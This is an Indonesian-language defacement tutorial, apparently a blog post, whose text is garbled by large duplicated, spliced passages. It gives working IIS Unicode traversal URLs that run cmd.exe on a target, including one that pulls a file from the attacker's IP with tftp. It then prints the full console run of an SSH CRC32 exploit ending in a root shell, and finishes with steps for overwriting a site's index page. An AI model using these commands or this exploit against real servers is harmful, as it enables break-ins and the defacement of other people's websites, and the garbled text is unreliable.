HacKeD by : ME
ThX tO ALL crew in %23cracxer oN IRC DALNET
NO THX TO :pak-tani"+>+ C:\InetPub\wwwroot\main.html Kita liat apa yg terjadi di IE kita. CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are : Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian : * Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c * Bagian command yaitu, cmdku.exe?/c+echo+ * Bagian HTML yaitu,..::DeFaCinG by : aku::..
ThX tO ALL crew in %23cracxer oN IRC DALNET
NO THX TO :pak-tani"+>+ C:\InetPub\wwwroot\main.html Kita liat apa yg terjadi di IE kita. CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are : Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian : * Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c * Bagian command yaitu, cmdku.exe?/c+echo+ * Bagian HTML yaitu,
HacKeD by : ME
ThX tO ALL crew in %23cracxer oN IRC DALNETNO THX TO :pak-tani"+>+ * Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu, C:\InetPub\wwwroot\main.html *Cara kedua:* Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya : http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:\InetPub\wwwroot\main.html Kita liat lagi apa yg terjadi di IE kita. CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are : Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi. Sayah akan uraikan juga URL tadee menjadi 4 bagian : * Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c * Bagian folder, yaitu /winnt/system32/ * Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ * Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu, C:\InetPub\wwwroot\main.html Kekurangannyah dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee. Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini. --------------------------------------------END-------------------------------------------------- Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2 cyber underground...hehehehe "yang kreatif donk..!!" Okeh sekrang kita ke UNIX yah...di unix sendiri yang perlu dilakukan untuk men-deface situs adalah memperoleh fasilitas root dari server tsb. Cara memperoleh fasilitas root tentu saja melalui exploit (mengenai masalah exploit bisa kalian lihat di bagian "Hacking Shell"). Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas root dari exploit "SSH CRC32 Exploit", exploit ini ditujukan pada SSH server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured to drop back to protocol 1. Ketika berjalan exploitnya akan bekerja seperti ini : [root@juventini]# ./x10 -t1 192.168.1.120 password: Target: Small - SSH-1.5-1.2.26 Attacking: 192.168.1.120:22 Testing if remote sshd is vulnerable # ATTACH NOWYES # Finding h - buf distance (estimate) (1 ) testing 0x00000004 # SEGV # (2 ) testing 0x0000c804 # FOUND # Found buffer, determining exact diff Finding h - buf distance using the teso method (3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV # (4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED # (5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED # (6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SEGV # (7 ) binary-search: h: 0x083f9ffc, slider: 0x00000800 # SEGV # (8 ) binary-search: h: 0x083f9bfc, slider: 0x00000400 # SEGV # (9 ) binary-search: h: 0x083f99fc, slider: 0x00000200 # SURVIVED # (10) binary-search: h: 0x083f9afc, slider: 0x00000100 # SEGV # (11) binary-search: h: 0x083f9a7c, slider: 0x00000080 # SEGV # (12) binary-search: h: 0x083f9a3c, slider: 0x00000040 # SEGV # (13) binary-search: h: 0x083f9a1c, slider: 0x00000020 # SEGV # (14) binary-search: h: 0x083f9a0c, slider: 0x00000010 # SURVIVED # (15) binary-search: h: 0x083f9a14, slider: 0x00000008 # SURVIVED # Bin search done, testing result Finding exact h - buf distance (16) trying: 0x083f9a14 # SURVIVED # Exact match found at: 0x000065ec Looking for exact buffer address Finding exact buffer address (17) Trying: 0x080865ec # SURVIVED # Finding distance till stack buffer (18) Trying: 0xb7f81400 # SEGV # (19) Trying: 0xb7f81054 # SEGV # (20) Trying: 0xb7f80ca8 # SEGV # (21) Trying: 0xb7f808fc # SEGV # (22) Trying: 0xb7f80550 # SEGV # (23) Trying: 0xb7f801a4 # SEGV # (24) Trying: 0xb7f7fdf8 # SEGV # (25) Trying: 0xb7f7fa4c # SEGV # (26) Trying: 0xb7f7f6a0 # SEGV # (27) Trying: 0xb7f7f2f4 # SEGV # (28) Trying: 0xb7f7ef48 # SEGV # (29) Trying: 0xb7f7eb9c # SEGV # (30) Trying: 0xb7f7e7f0 # SEGV # (31) Trying: 0xb7f7e444 # SEGV # (32) Trying: 0xb7f7e098 # SURVIVED # verifying (33) Trying: 0xb7f7e098 # SEGV # OK Finding exact h - stack_buf distance (34) trying: 0xb7f7de98 slider: 0x0200# SURVIVED # (35) trying: 0xb7f7dd98 slider: 0x0100# SURVIVED # (36) trying: 0xb7f7dd18 slider: 0x0080# SEGV # (37) trying: 0xb7f7dd58 slider: 0x0040# SEGV # (38) trying: 0xb7f7dd78 slider: 0x0020# SURVIVED # (39) trying: 0xb7f7dd68 slider: 0x0010# SEGV # (40) trying: 0xb7f7dd70 slider: 0x0008# SEGV # (41) trying: 0xb7f7dd74 slider: 0x0004# SURVIVED # (42) trying: 0xb7f7dd72 slider: 0x0002# SEGV # Final stack_dist: 0xb7f7dd74 EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfa ATTACH NOW Changing MSW of return address to: 0x0808 Crash, finding next return address Changing MSW of return address to: 0x0809 Crash, finding next return address Changing MSW of return address to: 0x080a Crash, finding next return address EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcf6 ATTACH NOW Changing MSW of return address to: 0x0808 Crash, finding next return address Changing MSW of return address to: 0x0809 Crash, finding next return address Changing MSW of return address to: 0x080a Crash, finding next return address EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfc ATTACH NOW Changing MSW of return address to: 0x0808 Crash, finding next return address Changing MSW of return address to: 0x0809 No Crash, might have worked Reply from remote: CHRIS CHRIS ***** YOU ARE IN ***** localhost.localdomain Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) .....HOREEEEE...dapat root heheehehhe, nah sekarang loe udah mendapatkan fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya halaman index pada server UNIX ditempatkan pada direktori tertentu, yaitu : home/html atau home/html/httpd atau bisa juga di direktori var/html atau var/html/httpd naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu...untuk meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama dari file halaman index situs itu..hmmm biasanya sich index.html atau index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo deh...gampang kan??? heheheh..cuman kalo gue rada malas sich make echo mending bikin halaman baru...;)), gini caranya : 1. ganti dulu nama indexnyamv index.htm oldindex.htm 2. sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm 3. masukan HTML yang kalian buat di vi ataupun pico tadi 4. buka browser kalian....heheeheh..udah ganti kan sekrang halamannya..:))) SiiiPPPP..!! Gitu aja kok caranya...mudah aja kan..?? hehehhe...intinya memang cuman bagaimana mendapatkan fasilitas root pada server, dan seperti yang telah gue bilang tadi bahwa setiap server memiliki karakteristik yang berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit yang berbeda apabila kita ingin mencoba menembus server yang memiliki OS yang berbeda pula...so many exploit out thare...just get iT..!! hehehhe udah dulu yah...BUBAYYYYYY!!!!!!!!!!!!
ThX tO ALL crew in %23cracxer oN IRC DALNETNO THX TO :pak-tani"+>+ * Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu, C:\InetPub\wwwroot\main.html *Cara kedua:* Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya : http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:\InetPub\wwwroot\main.html Kita liat lagi apa yg terjadi di IE kita. CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are : Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi. Sayah akan uraikan juga URL tadee menjadi 4 bagian : * Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c * Bagian folder, yaitu /winnt/system32/ * Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ * Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu, C:\InetPub\wwwroot\main.html Kekurangannyah dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee. Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini. --------------------------------------------END-------------------------------------------------- Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2 cyber underground...hehehehe "yang kreatif donk..!!" Okeh sekrang kita ke UNIX yah...di unix sendiri yang perlu dilakukan untuk men-deface situs adalah memperoleh fasilitas root dari server tsb. Cara memperoleh fasilitas root tentu saja melalui exploit (mengenai masalah exploit bisa kalian lihat di bagian "Hacking Shell"). Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas root dari exploit "SSH CRC32 Exploit", exploit ini ditujukan pada SSH server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured to drop back to protocol 1. Ketika berjalan exploitnya akan bekerja seperti ini : [root@juventini]# ./x10 -t1 192.168.1.120 password: Target: Small - SSH-1.5-1.2.26 Attacking: 192.168.1.120:22 Testing if remote sshd is vulnerable # ATTACH NOWYES # Finding h - buf distance (estimate) (1 ) testing 0x00000004 # SEGV # (2 ) testing 0x0000c804 # FOUND # Found buffer, determining exact diff Finding h - buf distance using the teso method (3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV # (4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED # (5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED # (6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SEGV # (7 ) binary-search: h: 0x083f9ffc, slider: 0x00000800 # SEGV # (8 ) binary-search: h: 0x083f9bfc, slider: 0x00000400 # SEGV # (9 ) binary-search: h: 0x083f99fc, slider: 0x00000200 # SURVIVED # (10) binary-search: h: 0x083f9afc, slider: 0x00000100 # SEGV # (11) binary-search: h: 0x083f9a7c, slider: 0x00000080 # SEGV # (12) binary-search: h: 0x083f9a3c, slider: 0x00000040 # SEGV # (13) binary-search: h: 0x083f9a1c, slider: 0x00000020 # SEGV # (14) binary-search: h: 0x083f9a0c, slider: 0x00000010 # SURVIVED # (15) binary-search: h: 0x083f9a14, slider: 0x00000008 # SURVIVED # Bin search done, testing result Finding exact h - buf distance (16) trying: 0x083f9a14 # SURVIVED # Exact match found at: 0x000065ec Looking for exact buffer address Finding exact buffer address (17) Trying: 0x080865ec # SURVIVED # Finding distance till stack buffer (18) Trying: 0xb7f81400 # SEGV # (19) Trying: 0xb7f81054 # SEGV # (20) Trying: 0xb7f80ca8 # SEGV # (21) Trying: 0xb7f808fc # SEGV # (22) Trying: 0xb7f80550 # SEGV # (23) Trying: 0xb7f801a4 # SEGV # (24) Trying: 0xb7f7fdf8 # SEGV # (25) Trying: 0xb7f7fa4c # SEGV # (26) Trying: 0xb7f7f6a0 # SEGV # (27) Trying: 0xb7f7f2f4 # SEGV # (28) Trying: 0xb7f7ef48 # SEGV # (29) Trying: 0xb7f7eb9c # SEGV # (30) Trying: 0xb7f7e7f0 # SEGV # (31) Trying: 0xb7f7e444 # SEGV # (32) Trying: 0xb7f7e098 # SURVIVED # verifying (33) Trying: 0xb7f7e098 # SEGV # OK Finding exact h - stack_buf distance (34) trying: 0xb7f7de98 slider: 0x0200# SURVIVED # (35) trying: 0xb7f7dd98 slider: 0x0100# SURVIVED # (36) trying: 0xb7f7dd18 slider: 0x0080# SEGV # (37) trying: 0xb7f7dd58 slider: 0x0040# SEGV # (38) trying: 0xb7f7dd78 slider: 0x0020# SURVIVED # (39) trying: 0xb7f7dd68 slider: 0x0010# SEGV # (40) trying: 0xb7f7dd70 slider: 0x0008# SEGV # (41) trying: 0xb7f7dd74 slider: 0x0004# SURVIVED # (42) trying: 0xb7f7dd72 slider: 0x0002# SEGV # Final stack_dist: 0xb7f7dd74 EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfa ATTACH NOW Changing MSW of return address to: 0x0808 Crash, finding next return address Changing MSW of return address to: 0x0809 Crash, finding next return address Changing MSW of return address to: 0x080a Crash, finding next return address EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcf6 ATTACH NOW Changing MSW of return address to: 0x0808 Crash, finding next return address Changing MSW of return address to: 0x0809 Crash, finding next return address Changing MSW of return address to: 0x080a Crash, finding next return address EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfc ATTACH NOW Changing MSW of return address to: 0x0808 Crash, finding next return address Changing MSW of return address to: 0x0809 No Crash, might have worked Reply from remote: CHRIS CHRIS ***** YOU ARE IN ***** localhost.localdomain Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) .....HOREEEEE...dapat root heheehehhe, nah sekarang loe udah mendapatkan fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya halaman index pada server UNIX ditempatkan pada direktori tertentu, yaitu : home/html atau home/html/httpd atau bisa juga di direktori var/html atau var/html/httpd naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu...untuk meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama dari file halaman index situs itu..hmmm biasanya sich index.html atau index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo deh...gampang kan??? heheheh..cuman kalo gue rada malas sich make echo mending bikin halaman baru...;)), gini caranya : 1. ganti dulu nama indexnyamv index.htm oldindex.htm 2. sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm 3. masukan HTML yang kalian buat di vi ataupun pico tadi 4. buka browser kalian....heheeheh..udah ganti kan sekrang halamannya..:))) SiiiPPPP..!! Gitu aja kok caranya...mudah aja kan..?? hehehhe...intinya memang cuman bagaimana mendapatkan fasilitas root pada server, dan seperti yang telah gue bilang tadi bahwa setiap server memiliki karakteristik yang berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit yang berbeda apabila kita ingin mencoba menembus server yang memiliki OS yang berbeda pula...so many exploit out thare...just get iT..!! hehehhe udah dulu yah...BUBAYYYYYY!!!!!!!!!!!!
0 komentar:
Posting Komentar